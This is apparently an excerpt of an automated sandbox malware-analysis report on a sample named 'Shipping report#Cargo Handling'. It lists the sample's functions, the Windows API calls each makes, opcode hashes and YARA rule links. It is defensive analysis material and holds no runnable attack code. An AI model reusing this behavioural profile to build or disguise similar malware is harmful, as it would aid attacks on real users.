Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: Library$Load$AddressFreeProc
String ID:
API String ID: 2632591731-0
Opcode ID: 6ac0d166cd61bc0013febe11f78c52fc9e627baaa8404ac92534d34f2d5097f2
Instruction ID: 986f86c8d06bf1b873933892b06da43df8b3414b893d9b03ea76f737dc8fa8c2
Opcode Fuzzy Hash: 6ac0d166cd61bc0013febe11f78c52fc9e627baaa8404ac92534d34f2d5097f2
Instruction Fuzzy Hash: 0811E332610306AACF24AF60DC12FED77A5AF50755F10842EF542A61D2EF709A46A790

Function 000C8402 Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

__wsopen_s.LIBCMT ref: 000C8440

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: __wsopen_s
String ID:
API String ID: 3347428461-0
Opcode ID: adb9bdd39b93923b7974dfcdfd16a8d5cb83dcee78b38391e6839e6f862aef56
Instruction ID: a4873a4fa891d62d58756a3248888e1eb354ba455e21e9134d50f58d542faea5
Opcode Fuzzy Hash: adb9bdd39b93923b7974dfcdfd16a8d5cb83dcee78b38391e6839e6f862aef56
Instruction Fuzzy Hash: B7111C7590410AAFCB15DF58E941EDE7BF5EF48314F158059FC08AB312D631DA11CB65

Function 000C5000 Relevance: 1.6, APIs: 1, Instructions: 52COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 000C4C7D: RtlAllocateHeap.NTDLL(00000008,00091129,00000000,?,000C2E29,00000001,00000364,?,?,?,000BF2DE,000C3863,00161444,?,000AFDF5,?), ref: 000C4CBE

_free.LIBCMT ref: 000C506C

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: AllocateHeap_free
String ID:
API String ID: 614378929-0
Opcode ID: 9ba45ce058d1080761d5af908226540236078fd1fc19e2e0238d0ad147f07c6e
Instruction ID: f5c7324e337cd90d6585ea214f6daf29beb8bd9cbef1dbbe385c9884c6b3b478
Opcode Fuzzy Hash: 9ba45ce058d1080761d5af908226540236078fd1fc19e2e0238d0ad147f07c6e
Instruction Fuzzy Hash: 030122762047046BE3358F699C85F9EFBE8FB89370F25062DE58483280EA30B845C6B4

Function 000BE602 Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
Instruction ID: 35586bd8857b74830c0ee116a3d91c4b7be22beccd579a958e626defb31190a9
Opcode Fuzzy Hash: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
Instruction Fuzzy Hash: 3DF02832510A149AC7313B69DC05FDE37D89F623B4F100729F821931D3DB70D80186A9

Function 00099CB3 Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00099CBD

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: _wcslen
String ID:
API String ID: 176396367-0
Opcode ID: e8927a259a13a384b7f8d17d197a21d4458e0330a19322b0a8ddd77362a479d3
Instruction ID: 08be3eaafb6476a18a8dbed40f31b6a9f75018b75245638355abd56ae5f8c2e3
Opcode Fuzzy Hash: e8927a259a13a384b7f8d17d197a21d4458e0330a19322b0a8ddd77362a479d3
Instruction Fuzzy Hash: 74F0C2B36016016ED7259F68DC06AEBBB98EB44760F10853EFA19CB1D2DB71E510CBA0

Function 000C4C7D Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000008,00091129,00000000,?,000C2E29,00000001,00000364,?,?,?,000BF2DE,000C3863,00161444,?,000AFDF5,?), ref: 000C4CBE

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 57006366b0534bbaf8239083576c260471398e2bbd2786bce8cec6ed4805f5d8
Instruction ID: 2983e172e31e0ce4c01996b90405dce242e111c59e027cfa1fa3f3878968b2cc
Opcode Fuzzy Hash: 57006366b0534bbaf8239083576c260471398e2bbd2786bce8cec6ed4805f5d8
Instruction Fuzzy Hash: E8F0E93160222477DBF15F629C9AF9E37C8BF417B1B144129FC19E72A2CB70D81186E0

Function 000C3820 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?,00161444,?,000AFDF5,?,?,0009A976,00000010,00161440,000913FC,?,000913C6,?,00091129), ref: 000C3852

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: acf0fc7267a63f86b2156a043552e6b501f10ff06f0af50f8d90788386a52883
Instruction ID: 792766441bd7a6a9937a0037c8f74e7cd8f4b4344861cbb800a1cebeca34074d
Opcode Fuzzy Hash: acf0fc7267a63f86b2156a043552e6b501f10ff06f0af50f8d90788386a52883
Instruction Fuzzy Hash: 24E0ED31124326A6E6712B669C02FEE3698AB42BB0F098038BC1592992CF20DE0586E0

Function 00094F39 Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,?,00161418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00094F6D

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: 449eeedce7e64ea7aa8416cdd11167ae3e2e830119a054dfeb1bc0bd2ca65e22
Instruction ID: cffabf95dfb027579d784a6f306b3630eda47b9fb2e61ae83caaefa04e884702
Opcode Fuzzy Hash: 449eeedce7e64ea7aa8416cdd11167ae3e2e830119a054dfeb1bc0bd2ca65e22
Instruction Fuzzy Hash: ECF03971105752CFDF349F64D4A4C66BBE4EF143293208A7EF2EA82A21C7319885EF50

Function 000FCCFF Relevance: 1.5, APIs: 1, Instructions: 26fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNELBASE(?,?,?,00000000,00000000,?,?,?,?,000DEE51,00153630,00000002), ref: 000FCD26

Part of subcall function 000FCC37: SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001,00000000,?,00000000,?,?,?,000FCD19,?,?,?), ref: 000FCC59
Part of subcall function 000FCC37: SetFilePointerEx.KERNEL32(?,?,00000000,00000000,00000001,?,000FCD19,?,?,?,?,000DEE51,00153630,00000002), ref: 000FCC6E
Part of subcall function 000FCC37: SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001,?,000FCD19,?,?,?,?,000DEE51,00153630,00000002), ref: 000FCC7A

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: File$Pointer$Write
String ID:
API String ID: 3847668363-0
Opcode ID: 5d8546e0969d53cf2ef604bfd0f25eecc7ddd7f6351840e983948b8c85c90bd8
Instruction ID: e28fb53a9249eb148313a530f9eb0eaf3c5cca6bccf8807d397943a224d1fb92
Opcode Fuzzy Hash: 5d8546e0969d53cf2ef604bfd0f25eecc7ddd7f6351840e983948b8c85c90bd8
Instruction Fuzzy Hash: 5DE03076400608EFD7219F46D901CAABBF8FF84254710852FEA5582511D371AA54DBA0

Function 00092DA5 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00092DC4

Part of subcall function 00096B57: _wcslen.LIBCMT ref: 00096B6A

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: LongNamePath_wcslen
String ID:
API String ID: 541455249-0
Opcode ID: 5855053ffba9e8eae84115ee9606ebcf30e83cd2305832685c7809f0dc483fd9
Instruction ID: a1a4a374232ade6731ec29ff472b059351671608884c4dd7c38845aa50541261
Opcode Fuzzy Hash: 5855053ffba9e8eae84115ee9606ebcf30e83cd2305832685c7809f0dc483fd9
Instruction Fuzzy Hash: 50E0CD726002246BCB209398DC05FDA77DDDFC8790F040071FD09D7249DE60ADC48590

Function 00092B3D Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 00093837: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00093908

Part of subcall function 0009D730: GetInputState.USER32 ref: 0009D807

SetCurrentDirectoryW.KERNEL32(?), ref: 00092B6B

Part of subcall function 000930F2: Shell_NotifyIconW.SHELL32(00000002,?), ref: 0009314E

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: IconNotifyShell_$CurrentDirectoryInputState
String ID:
API String ID: 3667716007-0
Opcode ID: db006c47e8d3c7053a8381e8eeb39759893de0a50f5fbf11c927bab22ed1f252
Instruction ID: 55f29f1b9ec86878569ce0a6b0d73bc8b08c80c43077624dc77e9f64c005e0ef
Opcode Fuzzy Hash: db006c47e8d3c7053a8381e8eeb39759893de0a50f5fbf11c927bab22ed1f252
Instruction Fuzzy Hash: DEE07D2130430427CE08BB75AC224FEF3899FD1351F80043EF14283163DF2085859752

Function 000D039A Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

CreateFileW.KERNELBASE(00000000,00000000,?,000D0704,?,?,00000000,?,000D0704,00000000,0000000C), ref: 000D03B7

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 1130c4ebcbbdd259f31ff965ea4822da9ddbf86a6caf47d5ee2df4eb27e808c4
Instruction ID: 6f55e5ff0b16ebd05c72d2bd2ad7232290a47bb8de8ed7bdc4174be68149a959
Opcode Fuzzy Hash: 1130c4ebcbbdd259f31ff965ea4822da9ddbf86a6caf47d5ee2df4eb27e808c4
Instruction Fuzzy Hash: 78D06C3204010DFBDF129F84DD06EDA3BAAFB48714F014000BE1856020C732E872AB90

Function 00091CAD Relevance: 1.5, APIs: 1, Instructions: 8COMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00002001,00000000,00000002), ref: 00091CBC

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: InfoParametersSystem
String ID:
API String ID: 3098949447-0
Opcode ID: 1e3dfbba9feecbd2dd9b289b9e0533859f85464f580e05c8e851ce564c36d64a
Instruction ID: 66ac25cb997a6212e523e3dcf71786ff6a04212602a76fe523c9c5336c40c15b
Opcode Fuzzy Hash: 1e3dfbba9feecbd2dd9b289b9e0533859f85464f580e05c8e851ce564c36d64a
Instruction Fuzzy Hash: F4C09236380305BFF2248B80BC4AF547764B759B10F088001F70AA9EE3C3F268A0EA90

Function 0010744A Relevance: 1.5, APIs: 1, Instructions: 220COMMON

Download Yara Rule

APIs

Part of subcall function 00095745: CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0009949C,?,00008000), ref: 00095773

GetLastError.KERNEL32(00000002,00000000), ref: 001076DE

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: CreateErrorFileLast
String ID:
API String ID: 1214770103-0
Opcode ID: 5e61e10636373e865d53d2761b147b3460376a20cfa15f4333810c2fc206da0e
Instruction ID: 2eb3a97de21b101f6d1eef8fc5c76a47a26756d3b4a36fa3e4c938f236732673
Opcode Fuzzy Hash: 5e61e10636373e865d53d2761b147b3460376a20cfa15f4333810c2fc206da0e
Instruction Fuzzy Hash: FA81AE306087019FDB15EF28C491AAEB7E1BF89314F04452DF89A5B2E2DB70ED45DB92

Function 00096246 Relevance: 1.3, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(?,?,00000000,000D24E0), ref: 00096266

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: d50d23c252fe5dd9fcd58237f7ce599dd5513b33332c498c3b3d2351bbb3fac4
Instruction ID: 1d53bc4f59b4768ac7c09526c406c543df403a06099b30f98b5a5e1e7a6586c9
Opcode Fuzzy Hash: d50d23c252fe5dd9fcd58237f7ce599dd5513b33332c498c3b3d2351bbb3fac4
Instruction Fuzzy Hash: D6E0B675400B01DFC7318F1AE804416FBF5FFE13613204A2EE1E692660D3B158869F50

Function 03527708 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000001F4), ref: 03527719

Memory Dump Source

Source File: 00000000.00000002.1880661294.0000000003525000.00000040.00000020.00020000.00000000.sdmp, Offset: 03525000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3525000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction ID: 150f8e0dd7a4f52f4d7fd89c30228278f9c260097c4f4d0b3e165ac23c3176e8
Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction Fuzzy Hash: 68E0E67494110DDFDB00DFB8D5496AD7FB4FF04301F1001A1FD01D2280D6309D508A62

Non-executed Functions

Function 00129576 Relevance: 72.4, APIs: 39, Strings: 2, Instructions: 625windowkeyboardCOMMON

Download Yara Rule

APIs

Part of subcall function 000A9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 000A9BB2

DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 0012961A
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0012965B
GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 0012969F
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 001296C9
SendMessageW.USER32 ref: 001296F2
GetKeyState.USER32(00000011), ref: 0012978B
GetKeyState.USER32(00000009), ref: 00129798
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 001297AE
GetKeyState.USER32(00000010), ref: 001297B8
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 001297E9
SendMessageW.USER32 ref: 00129810
SendMessageW.USER32(?,00001030,?,00127E95), ref: 00129918
ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 0012992E
ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00129941
SetCapture.USER32(?), ref: 0012994A
ClientToScreen.USER32(?,?), ref: 001299AF
ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 001299BC
InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 001299D6
ReleaseCapture.USER32 ref: 001299E1
GetCursorPos.USER32(?), ref: 00129A19
ScreenToClient.USER32(?,?), ref: 00129A26
SendMessageW.USER32(?,00001012,00000000,?), ref: 00129A80
SendMessageW.USER32 ref: 00129AAE
SendMessageW.USER32(?,00001111,00000000,?), ref: 00129AEB
SendMessageW.USER32 ref: 00129B1A
SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00129B3B
SendMessageW.USER32(?,0000110B,00000009,?), ref: 00129B4A
GetCursorPos.USER32(?), ref: 00129B68
ScreenToClient.USER32(?,?), ref: 00129B75
GetParent.USER32(?), ref: 00129B93
SendMessageW.USER32(?,00001012,00000000,?), ref: 00129BFA
SendMessageW.USER32 ref: 00129C2B
ClientToScreen.USER32(?,?), ref: 00129C84
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00129CB4
SendMessageW.USER32(?,00001111,00000000,?), ref: 00129CDE
SendMessageW.USER32 ref: 00129D01
ClientToScreen.USER32(?,?), ref: 00129D4E
TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00129D82

Part of subcall function 000A9944: GetWindowLongW.USER32(?,000000EB), ref: 000A9952

GetWindowLongW.USER32(?,000000F0), ref: 00129E05

Strings

@GUI_DRAGID, xrefs: 0012997D
F, xrefs: 00129D07

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease
String ID: @GUI_DRAGID$F
API String ID: 3429851547-4164748364
Opcode ID: 299ab21b270b0e4e23764f671bbeb61c1f8f87130e8bf8dd1da35979fe8b7d25
Instruction ID: 45c6939c2d4f721d247c09dba6446ff30fd71cf9b3de14a850ef303a8f86c39a
Opcode Fuzzy Hash: 299ab21b270b0e4e23764f671bbeb61c1f8f87130e8bf8dd1da35979fe8b7d25
Instruction Fuzzy Hash: 89429A74204210AFDB24CF28DC84EAABBE5FF49314F144A19F699876A1D771E8B1CF91

Function 00124873 Relevance: 60.1, APIs: 33, Strings: 1, Instructions: 566windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000408,00000000,00000000), ref: 001248F3
SendMessageW.USER32(00000000,00000188,00000000,00000000), ref: 00124908
SendMessageW.USER32(00000000,0000018A,00000000,00000000), ref: 00124927
SendMessageW.USER32(?,00000148,00000000,00000000), ref: 0012494B
SendMessageW.USER32(00000000,00000147,00000000,00000000), ref: 0012495C
SendMessageW.USER32(00000000,00000149,00000000,00000000), ref: 0012497B
SendMessageW.USER32(00000000,0000130B,00000000,00000000), ref: 001249AE
SendMessageW.USER32(00000000,0000133C,00000000,?), ref: 001249D4
SendMessageW.USER32(00000000,0000110A,00000009,00000000), ref: 00124A0F
SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 00124A56
SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 00124A7E
IsMenu.USER32(?), ref: 00124A97
GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00124AF2
GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00124B20
GetWindowLongW.USER32(?,000000F0), ref: 00124B94
SendMessageW.USER32(?,0000113E,00000000,00000008), ref: 00124BE3
SendMessageW.USER32(00000000,00001001,00000000,?), ref: 00124C82
wsprintfW.USER32 ref: 00124CAE
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00124CC9
GetWindowTextW.USER32(?,00000000,00000001), ref: 00124CF1
SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00124D13
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00124D33
GetWindowTextW.USER32(?,00000000,00000001), ref: 00124D5A

Strings

%d/%02d/%02d, xrefs: 00124CA8

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

